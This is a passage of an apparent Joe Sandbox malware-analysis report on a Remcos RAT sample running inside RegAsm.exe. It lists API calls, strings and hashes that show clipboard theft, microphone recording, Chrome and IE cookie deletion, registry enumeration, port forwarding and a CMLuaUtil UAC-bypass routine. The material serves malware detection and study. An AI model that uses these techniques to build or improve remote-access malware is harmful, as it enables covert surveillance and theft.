              • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
              • String ID: CloseChat$DisplayMessage$GetMessage
              APIs
                • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
              • CloseHandle.KERNEL32(00000000), ref: 00417DE5
              • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
              • String ID: 0VG$0VG$<$@$Temp
              APIs
              • OpenClipboard.USER32 ref: 00416941
              • EmptyClipboard.USER32 ref: 0041694F
              • CloseClipboard.USER32 ref: 00416955
              • OpenClipboard.USER32 ref: 0041695C
              • GetClipboardData.USER32 ref: 0041696C
              • GlobalLock.KERNEL32 ref: 00416975
              • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
              • CloseClipboard.USER32 ref: 00416984
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
              • String ID: !D@
              APIs
              • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
              • GetFileSize.KERNEL32(?,00000000), ref: 00413432
              • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
              • CloseHandle.KERNEL32(00000000), ref: 0041345F
              • CloseHandle.KERNEL32(?), ref: 00413465
              • API ID: File$CloseHandleView$CreateMappingSizeUnmap
              • String ID:
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              APIs
              • _free.LIBCMT ref: 00448135
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00448141
              • _free.LIBCMT ref: 0044814C
              • _free.LIBCMT ref: 00448157
              • _free.LIBCMT ref: 00448162
              • _free.LIBCMT ref: 0044816D
              • _free.LIBCMT ref: 00448178
              • _free.LIBCMT ref: 00448183
              • _free.LIBCMT ref: 0044818E
              • _free.LIBCMT ref: 0044819C
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              APIs
              Strings
              • API ID: Eventinet_ntoa
              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
              APIs
              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
              Strings
              • API ID: DecodePointer
              • String ID: acos$asin$exp$log$log10$pow$sqrt
              APIs
              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
              • Sleep.KERNEL32(00000064), ref: 00417521
              • DeleteFileW.KERNEL32(00000000), ref: 00417555
              Strings
              • API ID: File$CreateDeleteExecuteShellSleep
              • String ID: /t $\sysinfo.txt$dxdiag$open$temp
              APIs
              • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
              • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
              Strings
              • API ID: CurrentProcess
              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
              APIs
              • _strftime.LIBCMT ref: 00401D50
                • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
              • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
              Strings
              • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
              • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
              • int.LIBCPMT ref: 00410E81
                • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
              • std::_Facet_Register.LIBCPMT ref: 00410EC1
              • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
              • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
              • __Init_thread_footer.LIBCMT ref: 00410F29
              Strings
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
              • String ID: ,kG$0kG
              APIs
              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
              • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
              • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
              • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
              • waveInStart.WINMM ref: 00401CFE
              Strings
              • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
              • String ID: dMG$|MG$PG
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
              • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
              • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
              • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
              • TranslateMessage.USER32(?), ref: 0041D4E9
              • DispatchMessageA.USER32 ref: 0041D4F3
              • GetMessageA.USER32 ref: 0041D500
              Strings
              • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
              • String ID: Remcos
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • _memcmp.LIBVCRUNTIME ref: 00445423
              • _free.LIBCMT ref: 00445494
              • _free.LIBCMT ref: 004454AD
              • _free.LIBCMT ref: 004454DF
              • _free.LIBCMT ref: 004454E8
              • _free.LIBCMT ref: 004454F4
              Strings
              • API ID: _free$ErrorLast$_abort_memcmp
              • String ID: C
              Strings
              • API ID:
              • String ID: tcp$udp
              APIs
              • __Init_thread_footer.LIBCMT ref: 004018BE
              • ExitThread.KERNEL32 ref: 004018F6
              • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              Strings
              • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
              • String ID: PkG$XMG$NG$NG
              APIs
              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
              • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • CloseHandle.KERNEL32(00000000), ref: 00407A4D
              • MoveFileW.KERNEL32 ref: 00407A6A
              • CloseHandle.KERNEL32(00000000), ref: 00407A95
              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
              • String ID: .part
              • API String ID: 1303771098-3499674018
              • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
              • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
              • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
              • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
              APIs
              • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
              • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
              • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: InputSend
              • String ID:
              • API String ID: 3431551938-0
              • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
              • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
              • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
              • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: __freea$__alloca_probe_16_free
              • String ID: a/p$am/pm$zD
              • API String ID: 2936374016-2723203690
              • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
              • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
              • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
              • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
              APIs
              • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
              • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Enum$InfoQueryValue
              • String ID: [regsplt]$xUG$TG
              • API String ID: 3554306468-1165877943
              • Opcode ID: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
              • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
              • Opcode Fuzzy Hash: 7e2048b5b4a15889db9c74ac39567fdb59dd46086023709b3913aff4f04af58e
              • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
              APIs
              • GetConsoleCP.KERNEL32 ref: 0044B3FE
              • __fassign.LIBCMT ref: 0044B479
              • __fassign.LIBCMT ref: 0044B494
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
              • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
              • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
              • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
              • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
              • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free
              • String ID: D[E$D[E
              • API String ID: 269201875-3695742444
              • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
              • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
              • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
              • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
              APIs
              • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseEnumInfoOpenQuerysend
              • String ID: xUG$NG$NG$TG
              • API String ID: 3114080316-2811732169
              • Opcode ID: 08b76a7912a30081b3e44aa767579625ce380fd121976155e2fb2c8398a0c7a5
              • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
              • Opcode Fuzzy Hash: 08b76a7912a30081b3e44aa767579625ce380fd121976155e2fb2c8398a0c7a5
              • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
              APIs
                • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
                • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
              • _wcslen.LIBCMT ref: 0041B763
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseCurrentOpenProcessQueryValue_wcslen
              • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
              • API String ID: 37874593-122982132
              • Opcode ID: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
              • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
              • Opcode Fuzzy Hash: 72adfb785b3f574a19d60f3d41fc94025ad2806abf0e3203f42f61a897081afc
              • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
              APIs
                • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
              • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
              • API String ID: 1133728706-4073444585
              • Opcode ID: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
              • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
              • Opcode Fuzzy Hash: c4bf94da8be876f49cea7471f0be2422906d591350fd81deebf31ce2b361b3bc
              • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
              • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
              • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
              • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
              APIs
                • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
              • _free.LIBCMT ref: 00450F48
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00450F53
              • _free.LIBCMT ref: 00450F5E
              • _free.LIBCMT ref: 00450FB2
              • _free.LIBCMT ref: 00450FBD
              • _free.LIBCMT ref: 00450FC8
              • _free.LIBCMT ref: 00450FD3
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
              • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
              • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
              • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
              • int.LIBCPMT ref: 00411183
                • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
              • std::_Facet_Register.LIBCPMT ref: 004111C3
              • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
              • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
              • String ID: (mG
              • API String ID: 2536120697-4059303827
              • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
              • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
              • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
              • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
              APIs
              • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
              • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
              • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
              • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
              • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
              APIs
              • CoInitializeEx.OLE32(00000000,00000002), ref: 004075D0
                • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
              • CoUninitialize.OLE32 ref: 00407629
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: InitializeObjectUninitialize_wcslen
              • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
              • API String ID: 3851391207-2216821008
              • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
              • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
              • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
              • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
              APIs
              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
              • GetLastError.KERNEL32 ref: 0040BAE7
              Strings
              • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
              • [Chrome Cookies not found], xrefs: 0040BB01
              • UserProfile, xrefs: 0040BAAD
              • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: DeleteErrorFileLast
              • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
              • API String ID: 2018770650-304995407
              • Opcode ID: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
              • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
              • Opcode Fuzzy Hash: 1760e3e0d40a85f21b6d805f5d6a4de2d8cd9e2060f798d2c7163d0a527507e4
              • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
              APIs
              • AllocConsole.KERNEL32 ref: 0041CDA4
              • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Console$AllocOutputShowWindow
              • String ID: Remcos v$4.9.4 Pro$CONOUT$
              • API String ID: 2425139147-3065609815
              • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
              • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
              • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
              • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
              APIs
              • __allrem.LIBCMT ref: 0043AC69
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
              • __allrem.LIBCMT ref: 0043AC9C
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
              • __allrem.LIBCMT ref: 0043ACD1
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
              • String ID:
              • API String ID: 1992179935-0
              • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
              • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
              • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
              • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
              APIs
